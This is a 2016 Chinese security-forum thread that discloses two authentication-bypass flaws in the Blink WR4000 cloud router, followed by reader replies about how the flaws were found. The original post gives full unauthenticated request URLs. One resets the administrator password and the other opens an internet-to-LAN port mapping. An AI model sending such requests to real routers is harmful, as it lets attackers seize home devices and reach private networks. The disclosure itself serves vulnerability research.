首页
社区
课程
招聘
[原创]阿里blink路由器漏洞分析
2016-6-12 17:38 20697

[原创]阿里blink路由器漏洞分析

2016-6-12 17:38
20697
必联公司的wr4000云路由器是阿里智能家居系列的一款产品,目前已经有超过5万人正在使用。通过本文中的方法分析官网提供的更新固件,我们找到了两个典型的漏洞。
1、认证绕过之管理员密码重置。在动态测试的结果显示我们可以在未登录路由器的情况下直接访问protomimacol.csp文件,通过构造请求链接http://192.168.16.1/protomimacol.csp?fname=system&opt=login_account&function=set&user=admin&password=admin123就可以重置user字段表示的用户的登录密码为password字段值。
2、认证绕过之内外网端口映射。动态测试的结果显示用户可以在未登录路由器的情况下直接访问protocol.csp文件,通过人工构造请求链接http://192.168.16.1/protocol.csp?fname=net&opt=host_nat&function=set&mac=00:05:5D:60:78:3E&act=add&out_port=80&in_port=80&proto=3&enable=1,就可以突破路由器的屏障,实现从互联网进入到局域网内的主动连接。其中mac字段是局域网内部的被映射的主机mac地址,in_port字段是局域网内被映射主机的端口,out_port是路由器开放的相对应的转发端口,proto为3表示此端口映射支持tcp和udp协议。

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 3
打赏
分享
最新回复 (17)
雪    币: 100
活跃值: (323)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
Arcade 2016-6-12 19:29
2
0
分析的过程呢?
雪    币: 92
活跃值: (154)
能力值: ( LV8,RANK:135 )
在线值:
发帖
回帖
粉丝
光棍节 2 2016-6-13 10:35
3
0
抓一下所有的数据包,然后重放就得到了
雪    币: 168
活跃值: (100)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
星际侠盗 2016-6-13 11:06
4
0
认真点写呗。
雪    币: 112
活跃值: (12)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
FckTheDog 2016-6-13 11:26
5
0
写得也算清楚了,主要是web功能没有任何校验啊。
雪    币: 202
活跃值: (40)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
ohyeath 1 2016-7-18 09:01
6
0
这个竟然都没有给精?这要是原创,就是公开了一个漏洞好吧,虽然使用面不够广。
雪    币: 77
活跃值: (795)
能力值: ( LV7,RANK:150 )
在线值:
发帖
回帖
粉丝
shuozhang 2 2016-7-31 16:27
7
0
好帖
雪    币: 1149
活跃值: (803)
能力值: ( LV13,RANK:260 )
在线值:
发帖
回帖
粉丝
ycmint 5 2016-7-31 17:02
8
0
==..... 这种肯定不能给好不好,你得写清楚啊... 两句话就能说明你有漏洞,那也太简单了
雪    币: 5
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
kernelry 2016-8-1 14:01
9
0
看帖回帖,虽然我不懂,但是我在学习~
雪    币: 355
活跃值: (584)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
gowabby 2016-8-1 15:24
10
0
感觉有意思要详细点就更好了
雪    币: 92
活跃值: (154)
能力值: ( LV8,RANK:135 )
在线值:
发帖
回帖
粉丝
光棍节 2 2016-8-7 08:31
11
0
说实话,漏洞的东西有时候就是很简单的,利用起来就是那么回事。。。。不知道怎么写详细
雪    币: 6782
活跃值: (4441)
能力值: (RANK:600 )
在线值:
发帖
回帖
粉丝
gjden 14 2016-8-26 16:00
12
0
可以把你是如何找到这个漏洞的过程写下来,分享你发现的方法等等,外国人喜欢把自己分析过程中遇到问题,如何解决的,甚至是当时的心情都记录下来,既可以给自己的技术经历留下记录,也可以影响更多的人。
雪    币: 35386
活跃值: (19270)
能力值: (RANK:350 )
在线值:
发帖
回帖
粉丝
kanxue 8 2016-8-26 19:11
13
0
是的,把成长经历用文字记录下,是一件很快乐的事!
雪    币: 168
活跃值: (100)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
星际侠盗 2016-8-27 04:16
14
0
写好文章也是一种能力。
雪    币: 92
活跃值: (154)
能力值: ( LV8,RANK:135 )
在线值:
发帖
回帖
粉丝
光棍节 2 2016-8-27 09:36
15
0
现在已经忘了当时的感觉了,哈哈
雪    币: 202
活跃值: (40)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
ohyeath 1 2016-11-8 21:41
16
0
他写的已经非常清楚了,我没有环境,没有实验,但从他说的情况看,明显是对修改口令的过程没有进行认证审核的一个漏洞。他的过程,推测是在记录了修改口令的数据流,然后直接在没有登录的情况下试用,结果也可以修改。我认为他自己回复的对,漏洞这东西,有时候就是很简单的东西(重点在有时候),就是没有分析国产化太多规律来遵循而已,对这个分析有效,对那个分析无效,需要很多耐心和精力。
雪    币: 92
活跃值: (154)
能力值: ( LV8,RANK:135 )
在线值:
发帖
回帖
粉丝
光棍节 2 2016-11-11 09:10
17
0
你是高手
雪    币: 202
活跃值: (40)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
ohyeath 1 2016-11-16 16:12
18
0
你能发现漏洞,还是硬件组成员,才是真正的高手。
游客
登录 | 注册 方可回帖
返回